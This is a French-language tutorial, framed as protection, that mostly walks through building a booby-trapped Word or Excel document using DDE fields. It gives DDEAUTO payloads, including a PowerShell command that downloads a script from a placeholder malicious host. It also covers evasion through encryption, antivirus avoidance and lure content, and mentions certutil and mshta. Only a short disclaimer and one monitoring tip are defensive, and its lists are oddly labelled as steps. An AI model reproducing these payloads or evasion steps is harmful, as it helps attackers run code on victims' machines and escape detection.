Protection 📄 Se protéger contre les attaques via macro DDE dans les documents Office

[Sylvain*]

Exploitation des documents Office contenant une macro DDE malveillante

Introduction

L'exploitation des fonctionnalités DDE (Dynamic Data Exchange) dans les documents Office permet aux attaquants d'exécuter des commandes arbitraires à l’ouverture d’un fichier, sans utiliser de macros VBA. Cette technique reste redoutablement efficace, car elle repose sur un comportement légitime d’Office souvent ignoré par les solutions antivirus classiques.

---

Prérequis

• Connaissance approfondie de Microsoft Office et Windows

• Maîtrise de l’éditeur de texte Notepad++ ou équivalent

• Droits administrateurs requis sur le poste cible

---

Niveau de difficulté

• Étape #1 : Création du document piégé

• Étape #2 : Injection de la commande DDE

• Étape #3 : Personnalisation du déclencheur

• Étape #4 : Test de déclenchement du payload

• Étape #5 : Éviter la détection

---

Les Avantages

• Étape #1 : Pas de macros nécessaires, évite les alertes habituelles

• Étape #2 : Fonctionne sur des versions Office anciennes et modernes

• Étape #3 : Peut être combiné à du social engineering

• Étape #4 : Facile à automatiser

• Étape #5 : Compatible avec Word, Excel et Outlook

---

Les Inconvénients

• Étape #1 : Détection accrue par les EDR modernes

• Étape #2 : Peut être désactivé par les mises à jour Office

• Étape #3 : Génère un avertissement utilisateur à l’ouverture

• Étape #4 : Repose sur le comportement utilisateur

• Étape #5 : Limité par la configuration du client Office

---

Étape #1

Créer un document Word ou Excel vierge

L’enregistrer au format .docx ou .xlsx

Changer l’extension du fichier en .zip

Extraire le contenu et modifier le fichier document.xml

---

Étape #2

Rechercher la balise <w:t> pour y injecter la ligne DDE

Exemple de charge utile DDE :

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}

Sauvegarder les modifications

Recompresser les fichiers et renommer en .docx

---

Étape #3

Modifier la commande DDE pour lancer une charge utile spécifique

Exemple pour télécharger un script :

{DDEAUTO c:\windows\system32\cmd.exe "/k powershell -Command Invoke-WebRequest -Uri http://malicious.site/payload.ps1 -OutFile payload.ps1"}

Enregistrer et renommer le fichier final

Tester l’ouverture dans un environnement isolé

---

Étape #4

Activer les messages d’alerte d’Office pour valider le fonctionnement

Observer si le script se déclenche après clic sur le bouton d’avertissement

Valider l’exécution de la commande

Répéter avec d'autres variantes de commande

---

Étape #5

Chiffrer le document avec un mot de passe

Intégrer le fichier dans une archive protégée

Désactiver l’analyse du document par les AV en limitant l’accès direct

Utiliser du contenu crédible pour inciter à l’ouverture

---

Astuce

L’utilisation de cmd.exe via DDEAUTO peut être combinée avec PowerShell, certutil ou mshta pour des charges utiles plus sophistiquées. Protégez les scripts dans un environnement contrôlé pour tester leur efficacité.

---

Mise en garde

Cette méthode constitue une technique d’attaque réelle et ne doit être utilisée que dans un cadre de test en laboratoire ou lors d’un audit de sécurité autorisé. Toute utilisation malveillante est illégale et répréhensible.

---

Conseil

Désactiver l’usage de DDE dans les configurations Office et surveiller les processus descendants de winword.exe et excel.exe pour détecter toute tentative d’exploitation DDE en environnement réel.

---

Solutions alternatives

• exploit dde office document

• disable dde in office group policy

• detection dde attack siem

---

Références utiles

• Support Microsoft

• Microsoft Learn

• Recherche GitHub

---

Conclusion

L’exploitation des champs DDE dans les documents Office représente une technique discrète et puissante permettant d’exécuter des commandes à l’ouverture de fichiers. Bien que de plus en plus détectée, elle reste un vecteur à surveiller activement pour les professionnels en cybersécurité.